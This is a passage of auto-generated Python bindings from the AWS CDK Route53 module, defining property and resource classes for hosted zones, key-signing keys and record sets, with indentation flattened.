:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzoneconfig.html#cfn-route53-hostedzone-hostedzoneconfig-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneConfigProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.HostedZoneTagProperty",
jsii_struct_bases=[],
name_mapping={"key": "key", "value": "value"},
)
class HostedZoneTagProperty:
def __init__(self, *, key: builtins.str, value: builtins.str) -> None:
'''
:param key: ``CfnHostedZone.HostedZoneTagProperty.Key``.
:param value: ``CfnHostedZone.HostedZoneTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzonetag.html
'''
self._values: typing.Dict[str, typing.Any] = {
"key": key,
"value": value,
}
@builtins.property
def key(self) -> builtins.str:
'''``CfnHostedZone.HostedZoneTagProperty.Key``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzonetag.html#cfn-route53-hostedzone-hostedzonetag-key
'''
result = self._values.get("key")
assert result is not None, "Required property 'key' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def value(self) -> builtins.str:
'''``CfnHostedZone.HostedZoneTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzonetag.html#cfn-route53-hostedzone-hostedzonetag-value
'''
result = self._values.get("value")
assert result is not None, "Required property 'value' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneTagProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.QueryLoggingConfigProperty",
jsii_struct_bases=[],
name_mapping={"cloud_watch_logs_log_group_arn": "cloudWatchLogsLogGroupArn"},
)
class QueryLoggingConfigProperty:
def __init__(self, *, cloud_watch_logs_log_group_arn: builtins.str) -> None:
'''
:param cloud_watch_logs_log_group_arn: ``CfnHostedZone.QueryLoggingConfigProperty.CloudWatchLogsLogGroupArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-queryloggingconfig.html
'''
self._values: typing.Dict[str, typing.Any] = {
"cloud_watch_logs_log_group_arn": cloud_watch_logs_log_group_arn,
}
@builtins.property
def cloud_watch_logs_log_group_arn(self) -> builtins.str:
'''``CfnHostedZone.QueryLoggingConfigProperty.CloudWatchLogsLogGroupArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-queryloggingconfig.html#cfn-route53-hostedzone-queryloggingconfig-cloudwatchlogsloggrouparn
'''
result = self._values.get("cloud_watch_logs_log_group_arn")
assert result is not None, "Required property 'cloud_watch_logs_log_group_arn' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "QueryLoggingConfigProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.VPCProperty",
jsii_struct_bases=[],
name_mapping={"vpc_id": "vpcId", "vpc_region": "vpcRegion"},
)
class VPCProperty:
def __init__(self, *, vpc_id: builtins.str, vpc_region: builtins.str) -> None:
'''
:param vpc_id: ``CfnHostedZone.VPCProperty.VPCId``.
:param vpc_region: ``CfnHostedZone.VPCProperty.VPCRegion``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-vpc.html
'''
self._values: typing.Dict[str, typing.Any] = {
"vpc_id": vpc_id,
"vpc_region": vpc_region,
}
@builtins.property
def vpc_id(self) -> builtins.str:
'''``CfnHostedZone.VPCProperty.VPCId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-vpc.html#cfn-route53-hostedzone-vpc-vpcid
'''
result = self._values.get("vpc_id")
assert result is not None, "Required property 'vpc_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def vpc_region(self) -> builtins.str:
'''``CfnHostedZone.VPCProperty.VPCRegion``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-vpc.html#cfn-route53-hostedzone-vpc-vpcregion
'''
result = self._values.get("vpc_region")
assert result is not None, "Required property 'vpc_region' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VPCProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZoneProps",
jsii_struct_bases=[],
name_mapping={
"name": "name",
"hosted_zone_config": "hostedZoneConfig",
"hosted_zone_tags": "hostedZoneTags",
"query_logging_config": "queryLoggingConfig",
"vpcs": "vpcs",
},
)
class CfnHostedZoneProps:
def __init__(
self,
*,
name: builtins.str,
hosted_zone_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.HostedZoneConfigProperty]] = None,
hosted_zone_tags: typing.Optional[typing.Sequence[CfnHostedZone.HostedZoneTagProperty]] = None,
query_logging_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.QueryLoggingConfigProperty]] = None,
vpcs: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.VPCProperty]]]] = None,
) -> None:
'''Properties for defining a ``AWS::Route53::HostedZone``.
:param name: ``AWS::Route53::HostedZone.Name``.
:param hosted_zone_config: ``AWS::Route53::HostedZone.HostedZoneConfig``.
:param hosted_zone_tags: ``AWS::Route53::HostedZone.HostedZoneTags``.
:param query_logging_config: ``AWS::Route53::HostedZone.QueryLoggingConfig``.
:param vpcs: ``AWS::Route53::HostedZone.VPCs``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
}
if hosted_zone_config is not None:
self._values["hosted_zone_config"] = hosted_zone_config
if hosted_zone_tags is not None:
self._values["hosted_zone_tags"] = hosted_zone_tags
if query_logging_config is not None:
self._values["query_logging_config"] = query_logging_config
if vpcs is not None:
self._values["vpcs"] = vpcs
@builtins.property
def name(self) -> builtins.str:
'''``AWS::Route53::HostedZone.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.HostedZoneConfigProperty]]:
'''``AWS::Route53::HostedZone.HostedZoneConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzoneconfig
'''
result = self._values.get("hosted_zone_config")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.HostedZoneConfigProperty]], result)
@builtins.property
def hosted_zone_tags(
self,
) -> typing.Optional[typing.List[CfnHostedZone.HostedZoneTagProperty]]:
'''``AWS::Route53::HostedZone.HostedZoneTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzonetags
'''
result = self._values.get("hosted_zone_tags")
return typing.cast(typing.Optional[typing.List[CfnHostedZone.HostedZoneTagProperty]], result)
@builtins.property
def query_logging_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.QueryLoggingConfigProperty]]:
'''``AWS::Route53::HostedZone.QueryLoggingConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-queryloggingconfig
'''
result = self._values.get("query_logging_config")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.QueryLoggingConfigProperty]], result)
@builtins.property
def vpcs(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.VPCProperty]]]]:
'''``AWS::Route53::HostedZone.VPCs``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-vpcs
'''
result = self._values.get("vpcs")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHostedZone.VPCProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnKeySigningKey(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnKeySigningKey",
):
'''A CloudFormation ``AWS::Route53::KeySigningKey``.
:cloudformationResource: AWS::Route53::KeySigningKey
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
hosted_zone_id: builtins.str,
key_management_service_arn: builtins.str,
name: builtins.str,
status: builtins.str,
) -> None:
'''Create a new ``AWS::Route53::KeySigningKey``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param hosted_zone_id: ``AWS::Route53::KeySigningKey.HostedZoneId``.
:param key_management_service_arn: ``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:param name: ``AWS::Route53::KeySigningKey.Name``.
:param status: ``AWS::Route53::KeySigningKey.Status``.
'''
props = CfnKeySigningKeyProps(
hosted_zone_id=hosted_zone_id,
key_management_service_arn=key_management_service_arn,
name=name,
status=status,
)
jsii.create(CfnKeySigningKey, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-hostedzoneid
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: builtins.str) -> None:
jsii.set(self, "hostedZoneId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="keyManagementServiceArn")
def key_management_service_arn(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-keymanagementservicearn
'''
return typing.cast(builtins.str, jsii.get(self, "keyManagementServiceArn"))
@key_management_service_arn.setter
def key_management_service_arn(self, value: builtins.str) -> None:
jsii.set(self, "keyManagementServiceArn", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-name
'''
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="status")
def status(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Status``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-status
'''
return typing.cast(builtins.str, jsii.get(self, "status"))
@status.setter
def status(self, value: builtins.str) -> None:
jsii.set(self, "status", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnKeySigningKeyProps",
jsii_struct_bases=[],
name_mapping={
"hosted_zone_id": "hostedZoneId",
"key_management_service_arn": "keyManagementServiceArn",
"name": "name",
"status": "status",
},
)
class CfnKeySigningKeyProps:
def __init__(
self,
*,
hosted_zone_id: builtins.str,
key_management_service_arn: builtins.str,
name: builtins.str,
status: builtins.str,
) -> None:
'''Properties for defining a ``AWS::Route53::KeySigningKey``.
:param hosted_zone_id: ``AWS::Route53::KeySigningKey.HostedZoneId``.
:param key_management_service_arn: ``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:param name: ``AWS::Route53::KeySigningKey.Name``.
:param status: ``AWS::Route53::KeySigningKey.Status``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html
'''
self._values: typing.Dict[str, typing.Any] = {
"hosted_zone_id": hosted_zone_id,
"key_management_service_arn": key_management_service_arn,
"name": name,
"status": status,
}
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def key_management_service_arn(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.KeyManagementServiceArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-keymanagementservicearn
'''
result = self._values.get("key_management_service_arn")
assert result is not None, "Required property 'key_management_service_arn' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def name(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def status(self) -> builtins.str:
'''``AWS::Route53::KeySigningKey.Status``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-keysigningkey.html#cfn-route53-keysigningkey-status
'''
result = self._values.get("status")
assert result is not None, "Required property 'status' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnKeySigningKeyProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRecordSet(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnRecordSet",
):
'''A CloudFormation ``AWS::Route53::RecordSet``.
:cloudformationResource: AWS::Route53::RecordSet
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
name: builtins.str,
type: builtins.str,
alias_target: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]] = None,
comment: typing.Optional[builtins.str] = None,
failover: typing.Optional[builtins.str] = None,
geo_location: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]] = None,
health_check_id: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
multi_value_answer: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
region: typing.Optional[builtins.str] = None,
resource_records: typing.Optional[typing.Sequence[builtins.str]] = None,
set_identifier: typing.Optional[builtins.str] = None,
ttl: typing.Optional[builtins.str] = None,
weight: typing.Optional[jsii.Number] = None,
) -> None:
'''Create a new ``AWS::Route53::RecordSet``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param name: ``AWS::Route53::RecordSet.Name``.
:param type: ``AWS::Route53::RecordSet.Type``.
:param alias_target: ``AWS::Route53::RecordSet.AliasTarget``.
:param comment: ``AWS::Route53::RecordSet.Comment``.
:param failover: ``AWS::Route53::RecordSet.Failover``.
:param geo_location: ``AWS::Route53::RecordSet.GeoLocation``.
:param health_check_id: ``AWS::Route53::RecordSet.HealthCheckId``.
:param hosted_zone_id: ``AWS::Route53::RecordSet.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSet.HostedZoneName``.
:param multi_value_answer: ``AWS::Route53::RecordSet.MultiValueAnswer``.
:param region: ``AWS::Route53::RecordSet.Region``.
:param resource_records: ``AWS::Route53::RecordSet.ResourceRecords``.
:param set_identifier: ``AWS::Route53::RecordSet.SetIdentifier``.
:param ttl: ``AWS::Route53::RecordSet.TTL``.
:param weight: ``AWS::Route53::RecordSet.Weight``.
'''
props = CfnRecordSetProps(
name=name,
type=type,
alias_target=alias_target,
comment=comment,
failover=failover,
geo_location=geo_location,
health_check_id=health_check_id,
hosted_zone_id=hosted_zone_id,
hosted_zone_name=hosted_zone_name,
multi_value_answer=multi_value_answer,
region=region,
resource_records=resource_records,
set_identifier=set_identifier,
ttl=ttl,
weight=weight,
)
jsii.create(CfnRecordSet, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-name
'''
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="type")
def type(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-type
'''
return typing.cast(builtins.str, jsii.get(self, "type"))
@type.setter
def type(self, value: builtins.str) -> None:
jsii.set(self, "type", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="aliasTarget")
def alias_target(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]]:
'''``AWS::Route53::RecordSet.AliasTarget``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-aliastarget
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]], jsii.get(self, "aliasTarget"))
@alias_target.setter
def alias_target(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.AliasTargetProperty"]],
) -> None:
jsii.set(self, "aliasTarget", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="comment")
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-comment
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "comment"))
@comment.setter
def comment(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "comment", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="failover")
def failover(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Failover``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-failover
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "failover"))
@failover.setter
def failover(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "failover", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="geoLocation")
def geo_location(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]]:
'''``AWS::Route53::RecordSet.GeoLocation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-geolocation
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]], jsii.get(self, "geoLocation"))
@geo_location.setter
def geo_location(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSet.GeoLocationProperty"]],
) -> None:
jsii.set(self, "geoLocation", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="healthCheckId")
def health_check_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HealthCheckId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-healthcheckid
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "healthCheckId"))
@health_check_id.setter
def health_check_id(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "healthCheckId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzoneid
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneName")
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzonename
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneName"))
@hosted_zone_name.setter
def hosted_zone_name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="multiValueAnswer")
def multi_value_answer(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``AWS::Route53::RecordSet.MultiValueAnswer``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-multivalueanswer
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], jsii.get(self, "multiValueAnswer"))
@multi_value_answer.setter
def multi_value_answer(
self,
value: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]],
) -> None:
jsii.set(self, "multiValueAnswer", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="region")
def region(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-region
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "region"))
@region.setter
def region(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "region", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resourceRecords")
def resource_records(self) -> typing.Optional[typing.List[builtins.str]]:
'''``AWS::Route53::RecordSet.ResourceRecords``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-resourcerecords
'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "resourceRecords"))
@resource_records.setter
def resource_records(
self,
value: typing.Optional[typing.List[builtins.str]],
) -> None:
jsii.set(self, "resourceRecords", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="setIdentifier")
def set_identifier(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.SetIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-setidentifier
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "setIdentifier"))
@set_identifier.setter
def set_identifier(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "setIdentifier", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="ttl")
def ttl(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.TTL``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-ttl
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "ttl"))
@ttl.setter
def ttl(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "ttl", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="weight")
def weight(self) -> typing.Optional[jsii.Number]:
'''``AWS::Route53::RecordSet.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-weight
'''
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "weight"))
@weight.setter
def weight(self, value: typing.Optional[jsii.Number]) -> None:
jsii.set(self, "weight", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSet.AliasTargetProperty",
jsii_struct_bases=[],
name_mapping={
"dns_name": "dnsName",
"hosted_zone_id": "hostedZoneId",
"evaluate_target_health": "evaluateTargetHealth",
},
)
class AliasTargetProperty:
def __init__(
self,
*,
dns_name: builtins.str,
hosted_zone_id: builtins.str,
evaluate_target_health: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
) -> None:
'''
:param dns_name: ``CfnRecordSet.AliasTargetProperty.DNSName``.
:param hosted_zone_id: ``CfnRecordSet.AliasTargetProperty.HostedZoneId``.
:param evaluate_target_health: ``CfnRecordSet.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html
'''
self._values: typing.Dict[str, typing.Any] = {
"dns_name": dns_name,
"hosted_zone_id": hosted_zone_id,
}
if evaluate_target_health is not None:
self._values["evaluate_target_health"] = evaluate_target_health
@builtins.property
def dns_name(self) -> builtins.str:
'''``CfnRecordSet.AliasTargetProperty.DNSName``.
